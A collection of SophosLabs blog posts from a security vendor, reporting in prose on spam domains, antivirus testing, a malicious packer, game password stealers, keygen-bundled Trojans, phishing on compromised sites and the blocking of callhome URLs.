SophosLabs blog

SophosLabs have seen a rise in the number of .HK domains. Being used for spam. Mainly the spam has been for Viagra and other erectile drugs.

• What is the reason for the rise in spam from Hong Kong?
• Spammers have obviously gotten around the registration checks on .HK domains and are acquiring loads of them.
• So what needs to happen?
• The registration checks obviously need to be stronger.

In the UK when you rent a flat it is normal that you pay a deposit (which you get back) of one month’s rent upfront plus the first months rent. Registering Domains is equivalent to renting them. Maybe Registrars should enforce an equivalent to a deposit and get people to pay upfront.

What do you think? Email me via sophosblog@sophos.com.

If there’s one job more difficult than being an anti-virus researcher, it’s being the poor guy who has to test anti-virus software!

This has been brought to light today as I looked into a recent test done by the respected independent testers at AV-Test.org, who are based at the University of Magdeburg in Germany.

A few customers have contacted SophosLabs in recent days asking about AV-Test.org’s latest set of detection test results. Their report, which examined a wide range of anti-virus products, was published in the German magazine PC Welt and its US counterpart PC World, and have cropped up in numerous places on the web.

We’ve been in touch with Andreas Marx of AV-Test.org who has kindly agreed to run some new tests for us and will be sending us the results shortly. We’ll be sure to update you on the blog as soon as we know more.

Only a couple of weeks ago the anti-virus industry met in Reykjavik to discuss how testing of anti-virus products could be improved and made more meaningful for companies trying to choose a security solution.

Packers have traditionally been employed to reduce executable footprints by compressing the executable. They have evolved since, to prevent patching and reverse engineering of the underlying application by integrating encryption, obfuscation and anti-debugging technology but never have they carried their own payloads.

A new batch of samples has recently been observed here in SophosLabs that exhibit traditional packer related features, such as encryption, compression and obfuscation and more. This hybrid packer has built-in functionality to modify personal firewall rules to allow the host program (once unpacked) to gain unauthorised network access.

This method of attack has traditionally been the realm of custom built Trojans and network worms, which makes us believe this new development indicates the Packer itself will be used, and can only be used, for malicious purposes.

The distinction between wrapper and content has now become as muddied as a winter football field and may justify many security professionals’ paranoia with packed files.

Online gaming has been the rage since the dawn of the internet. In its infancy, online gaming was confined to a few servers and hobbyists. These days, online gaming is a multi-million dollar industry. Online gamers are literally spoilt for choice with games nowadays with Blizzard Entertainment’s World Of Warcraft still going on strong.

It is thus not surprising that SophosLabs analysts continue to see password stealers targeting popular games like World Of Warcraft. Troj/WowPWS-BB is the latest attempt by malware authors to steal information relating to this game and it probably won’t be the last.

The problem with password stealing Trojans like Troj/WowPWS-BB is they don’t announce their presence visibly once they’ve been installed on an infected computer. And usually, the only time victims learn something is amiss is when their World Of Warcraft characters have been depleted of all their online possessions.

By that time, it is often too late.

Password crackers and key generators have long been the bane of commercial software companies because they allow users to circumvent their protection mechanisms without the need to purchase their software.

As a result, it should come as no surprise that some malware authors prey on this particularly vulnerable group of users.

For instance, SophosLabs analysts encountered a Trojan (Troj/Mdrop-BPE) that came bundled with a password key generator and a worm with IRC backdoor functionality. When run, the Trojan not only drops the password generator crack for Adobe Photoshop CS3 (Troj/Keygen-BI) but as an additional freebie, it potentially turns your computer into a IRC zombie machine (W32/IRCBot-WA) as well.

As they say, if something looks too “good” to be true, it usually is.

Another relatively quiet shift on the malware front, but a little more life within the spam feeds. There have been a number of phishing attacks successfully intercepted today. The usual mixture of targetted brands were present, including Brazilian, American and British banks. Some of the attacks used domains specifically constructed for the job, others used legitimate sites. As noted in a previous post on phishing attacks using compromised sites, digging a little deeper can often reveal some interesting information. Two of the cases probed today are discussed below.

The first interesting phish today targetted Poste Italiane Group (again).

Looking at the URL of the phish site, it was clearly a compromised machine. The host site appears to use RRDtool (a logging and graphing application) and Cacti (its graphical frontend). Someone appears to have compromised the site and upload additional content into one of the directories hosting RRD files. Aside from hosting the phishing site, MailMailer (from softSWOT) is present, suggesting that the compromised site is also being used to send spam. Also, a Perl remote shell was discovered. Once running, this connects to a remote IRC server to await commands. Shells such as this are typically used to scan remote machines and launch exploit or denial of service (DoS) attacks.

One of the other compromised sites used by a phishing attack was uncovered when investigating an attack against Wells Fargo.

Again inspecting the URL of the phish site, revealed it to be hosted on a compromised site, in this case a reasonably popular news/sport/music portal. In this case the hackers seem happy to openly brag of their achievements, dropping their tag within the compromised site (obscenity removed from image):

These (and many other similar) cases reflect the freedom that intruders have to upload whatever content they wish to a compromised site. Of course, nowadays that content is usually geared towards achieving financial gain (eg. phishing attack or installation of malware).

Things have been eerily quiet on the malware front this weekend. Perhaps the malware authors are taking a time out, shopping for computer parts or something. Or is there some nefarious scheming afoot in order to unleash misery on the innocents at some distinct future date?

Meanwhile, the malware authors’ bosom buddies, the spammers, have obviously decided to defer their “holiday” because the spam has been coming in thick and fast. The spam messages that have been seen are the same old viagra, phishing and stock campaigns with some porn thrown in. Nothing to spa … er … write home about.

In any case my advice is to keep your eyes peeled. The criminals may need to replenish their post-holiday finances and we shall all be the target of insidious activity. On the other hand, it may well turn out to be storm in a tea cup.

Readers will no doubt be familiar with the concept of categorising URLs, and how this forms an important part of security today. Classification enables users to prevent access to URLs that are known to be hosting undesirable content (ranging from phishing sites to malware), or to URLs known to be unsuitable from a policy perspective (for example, gambling sites). A classification type we take very seriously within SophosLabs is that labelled callhome URLs.

So what exactly is a callhome URL? We use this classification for the sites to which malicious files connect in order to download more components or ‘report home’ (and receive remote command). Examples of the latter include typical IRC bots and backdoor and proxy Trojans (for example, Troj/Proxy-HR).

Why is it so important to recognise and block callhome connections? This becomes apparent if you consider the difference between the terms infected and compromised. When a piece of malicious code runs, the machine can be said to be infected. However, as soon as someone has some form of remote access to (and control of) the machine, it is compromised. Infected machines can be cleaned - malware can be analysed, and the changes it makes upon execution reversed (in most cases). However, once a machine has been compromised, cleaning is not possible. Of course, the malware can be removed, and the changes known to have made made reversed. But without knowing what changes were made by the intruder with remote access to that machine, it cannot be restored to its original pre-infected state. The victim will rarely know what data has been viewed or tampered with.

So, the business of recognising (and blocking) as many callhome connections as possible is just another piece in the ‘providing protection’ puzzle. Even in cases where the malware itself may be missed, and a machine becomes infected, being able to block the callhome connection can make a huge difference.

Researchers at SophosLabs have released detection for Troj/Small-EJA.

As the name implies, Troj/Small-EJA has a very small filesize in comparison to a lot of malware in the wild.

Being small however does not mean this malware cannot wreak havoc on a users computer.

Troj/Small-EAJ is designed to download other malware from the internet and execute it without the users permission.

Weighing in at just over 1 kilobyte in size it is small enough to have downloaded to your computer before you have had the chance to think things through.

Also, if the malware author wished to spam out his creation, which is very common these days, he could do so at a much faster rate, and then let the infected computer do the majority of the downloading.

If successful Troj/Small-EJA will download and run Troj/Rustok-R.

Troj/Rustok-R will create and execute a rootkit which is designed to stealth itself and potentially other malware Troj/Rustok-R may download and execute.

This all goes to show, its not the size of the file that counts :).

As part of this blog, I plan on providing a weekly summary of what’s been happening in SophosLabs

In many ways it has been a regular week, a large number of the usual variants in malware, spammers up to their usual tricks and a constant stream of new compromised websites.

Last nights “Pirates of the Caribbean” attack shows how organised and opportunistic malware authors are. Timing the spamming out of the Trojan with the release of the film, although not a great inspiration, it does highlight the professional approach authors are taken.

BadBunny is at the opposite end of the scale, a completely pointless proof of concept that had no real possibility of seriously affecting anyone, whilst Gatina-B highlights how malware is targeted and regional.

In the world of spam, we’ve been seeing quite a lot of abuse of image hosting sites. The technique is similar to the previous abuse of free host sites like Geocities, but in this case, an image is posted and the link included in the spam. Campaigns are stock pump and dump scams along the lines of the ‘normal’ German image spam that became so popular earlier this year. We’ll be going into more detail on this particular technique in the days to come.

With the weekend coming up and public holidays in many countries, it will be interesting to see what happens, the past has shown that it will be either very quiet as the hackers take time out, or it will be busy with many new campaigns. My bet is on the latter I’m afraid. Either way, we’ll have analysts on duty in the labs around the globe to deal with what does (or doesn’t happen)